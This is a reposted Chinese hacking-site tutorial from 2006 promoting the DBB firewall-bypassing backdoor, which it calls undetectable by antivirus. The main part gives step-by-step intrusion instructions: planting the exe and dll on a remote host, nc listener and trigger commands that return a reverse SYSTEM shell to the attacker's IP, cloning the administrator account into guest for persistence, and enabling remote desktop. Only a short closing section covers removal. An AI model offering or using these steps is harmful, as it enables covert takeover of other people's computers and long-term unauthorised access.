为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 编程开发 查看内容

穿梭于防火墙下的黑马-DBB后门程序

2006-1-20 04:26| 投稿: soft

摘要: 今天要为大家介绍的DarkStorm BePassFireWall BackDoor  V1.2是一款成功率极高的反弹端口穿透防火墙的后门程序(以下简称DBB),可以穿透99%的防火墙。该后...
今天要为大家介绍的DarkStorm BePassFireWall BackDoor  V1.2是一款成功率极高的反弹端口穿透防火墙的后门程序(以下简称DBB),可以穿透99%的防火墙。该后门采用线程插入技术,隐蔽性极高,在系统中以服务形式加载,拥有system权限,一旦运行,很难将其删除。同时,最重要的是,现在还没有杀毒软件能够查杀它,可以说是现在理想的后门程序了。下面就让我们一起来领略一下DBB的独到魅力吧! 一、配置后门 第一步当然是把三、轻松操纵当回家,在使用后门前,请先用压缩包内的config DarkStorm.exe程序配置后门。双击运行config DarkStorm.exe,打开如图1所示的配置对话窗口,根据提示输入相关数据。其实,该后门支持不经过配置就可直接使用,这时将使用后门的默认配置:反向连接端口是8888,关键字是NOIR,服务名是DNScnsvc。 小提示:DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成,这两个exe和DLL文件是可以改名的,但是必须要改成同样的名字,比如,可以把exe文件改名为123.exe,那么dll文件也要相应的改名为123.dll。 二、打开后门 要运行后门很简单,只要将exe和dll文件上传到远程主机上之后,直接运行exe文件,后门即可被加载。 小提示:exe文件和dll文件不必一定要放到system32中,但必须在同一文件夹下。 大家都知道,现在很多情况下主机是在防火墙后面的,如何让后门来逃避防火墙的火眼金睛呢?这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的,仅支持nc反向连接。 首先在本地计算机中使用nc监听本地计算机的8888端口,进入命令行状态,运行如下命令: nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....),接着再开一个命令行窗口,运行命令:nc 220.202.242.101 139,然后输入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址,NOIR为反弹激活字,220.202.242.98:8888为反向连接的IP地址,也就是本机IP地址及端口。如果反向连接成功,就会在本地计算机中得到目标主机的一个系统权限SHELL(如图2)。   三、轻松操纵 当成功获取了目标计算机的一个系统权限的SHELL后,就等于已经手握该台计算机的生杀大权。令人更加欣喜的是,DBB还拥有一些非常实用的控制功能。 1.帐户克隆 为了下次能够顺利控制目标计算机,一般的手法就是克隆一个系统权限的帐户,在这里,使用clone命令就可以轻松克隆一个本地用户。其语法格式为:clone username clonename password,其中,username是被克隆的用户的用户名,一般是administrator;clonename是你要克隆为username的用户名,一般是guest;password是你为克隆用户设置的密码,最长32位。例如,要把Guest克隆为管理员帐户,并且设置密码为snow,就只要运行命令:clone administrator guest snow(如图3)。 2.开启终端服务 远程终端服务可以说是最为理想的远程控制方式,因此,当成功入侵目标计算机后,大部分人总是想方设法来开启被控计算机的终端服务。虽然说开启3389终端服务的方法有很多,可都是有一定难度的。不过还好,有了该后门,只要用一条命令就可以轻松开启3389服务,其命令为:term port。例如:运行命令“term 3389”(如图4),这样就将开启目标计算机的端终服务,终端服务通讯端口为3389,重新启动计算机即可生效。 小提示:终端服务只在Windows 2000服务器以上版本才拥有。 3.进程管理 想知道目标计算机运行了哪些程序吗?很简单,运行命令:pslist,这样就可以显示本地所有用户进程和相对应的pid号。如果想结束某一进程的运行,请运行命令:pskill pid,提示:pid指的是进程ID号(如图5)。 另外,还有诸如Logoff(注销当前用户)、Reboot(重启系统)、Shutdown(关闭系统)、Poweroff(关闭电源)等命令可供使用。 四、封杀后门 如果不幸中了该后门,可以通过如下方法来删除。打开注册表编辑,依次展开如下子键:HKEY_LOCAL_MACHINESYSTEMCurrentControlSet Services,找到并删除该子键下的DNScnsvc键(如图6),再重新启动系统即可。若服务名是自己设定的,请删除相关服务名的子键。 小提示:本地计算机即接受反向SHELL的系统,必须拥有独立公网IP上网的计算机。另外,由于该后门使用的是无驱动的嗅探,无法嗅探本机对本机发起的数据请求,所以在对本机的测试中,是无法成功的。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部